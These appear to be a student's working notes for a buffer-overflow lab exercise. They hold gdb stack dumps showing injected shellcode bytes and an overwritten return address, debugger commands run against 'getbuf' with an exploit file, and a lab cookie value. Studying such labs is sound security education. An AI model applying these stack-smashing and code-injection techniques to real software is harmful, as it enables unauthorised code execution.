1234567891113151719212325272931353739cccccccccccccccccccó



0x7fffffffbc70:	0x31	0x32	0x33	0x34	0x35	0x36	0x37	0x38
0x7fffffffbc78:	0x39	0x31	0x31	0x31	0x33	0x31	0x35	0x31
0x7fffffffbc80:	0x37	0x31	0x39	0x32	0x31	0x32	0x33	0x32
0x7fffffffbc88:	0x35	0x32	0x37	0x32	0x39	0x33	0x31	0x33
0x7fffffffbc90:	0x35	0x33	0x37	0x33	0x39	0x63	0x63	0x63
0x7fffffffbc98:	0x63	0x63	0x63	0x63	0x63	0x63	0x63	0x63
0x7fffffffbca0:	0x63	0x63	0x63	0x63	0x63	0x63	0x63	0x63
0x7fffffffbca8:	0x70	0x10	0x40	0x00	0x00	0x00	0x00	0x00
0x7fffffffbcb0:	0xe0	0xbc	0xff	0xff	0xff	0x7f	0x00	0x00
0x7fffffffbcb8:	0xef	0xbe	0xad	0xde	0x00	0x00	0x00	0x00


(gdb) x /64x $rsp
0x7fffffffbcb0:	0xe0	0xbc	0xff	0xff	0xff	0x7f	0x00	0x00
0x7fffffffbcb8:	0xef	0xbe	0xad	0xde	0x00	0x00	0x00	0x00
0x7fffffffbcc0:	0x20	0x01	0x3b	0x60	0x32	0x00	0x00	0x00
0x7fffffffbcc8:	0x14	0xa3	0x28	0x4b	0x00	0x00	0x00	0x00
0x7fffffffbcd0:	0x10	0xe1	0xff	0xff	0xff	0x7f	0x00	0x00
0x7fffffffbcd8:	0xdd	0x0f	0x40	0x00	0x00	0x00	0x00	0x00
0x7fffffffbce0:	0xf4	0xf4	0xf4	0xf4	0xf4	0xf4	0xf4	0xf4
0x7fffffffbce8:	0xf4	0xf4	0xf4	0xf4	0xf4	0xf4	0xf4	0xf4


0x7fffffffbc70:	0x55	0x48	0xc7	0xc5	0x20	0x10	0x40	0x00
0x7fffffffbc78:	0x49	0xc7	0xc1	0x08	0x23	0x60	0x00	0x00
0x7fffffffbc80:	0xc7	0x01	0x72	0x00	0x00	0x00	0x49	0xc7
0x7fffffffbc88:	0x41	0x01	0x00	0x61	0x56	0x00	0x5d	0xc3
0x7fffffffbc90:	0x35	0x33	0x37	0x33	0x39	0x63	0x63	0x63
0x7fffffffbc98:	0x63	0x63	0x63	0x63	0x63	0x63	0x63	0x63
0x7fffffffbca0:	0x28	0x10	0x40	0x00	0x00	0x00	0x00	0x00
0x7fffffffbca8:	0x70	0xbc	0xff	0xff	0xff	0x7f	0x00	0x00

b getbuf
r -u 879181 < dynamite.txt
i r $rsp $rbp
n
n
x /100xb 0x7fffffffbc70
x /10i 0x7fffffffbc70

b *0x7fffffffbc70
jump 141
x /10i 0x7fffffffbc70
stepi
stepi
x /8xb $rsp + 0x8
stepi
stepi
stepi
stepi
stepi
i r $rsp $rbp


0x401028
x /20i 0x7fffffffbc70

stepi
x /40xb 0x7fffffffbca0

stepi
disas
q


cookie
de
a0
3b
72
ba
61
56
61
0x615661ba723ba0de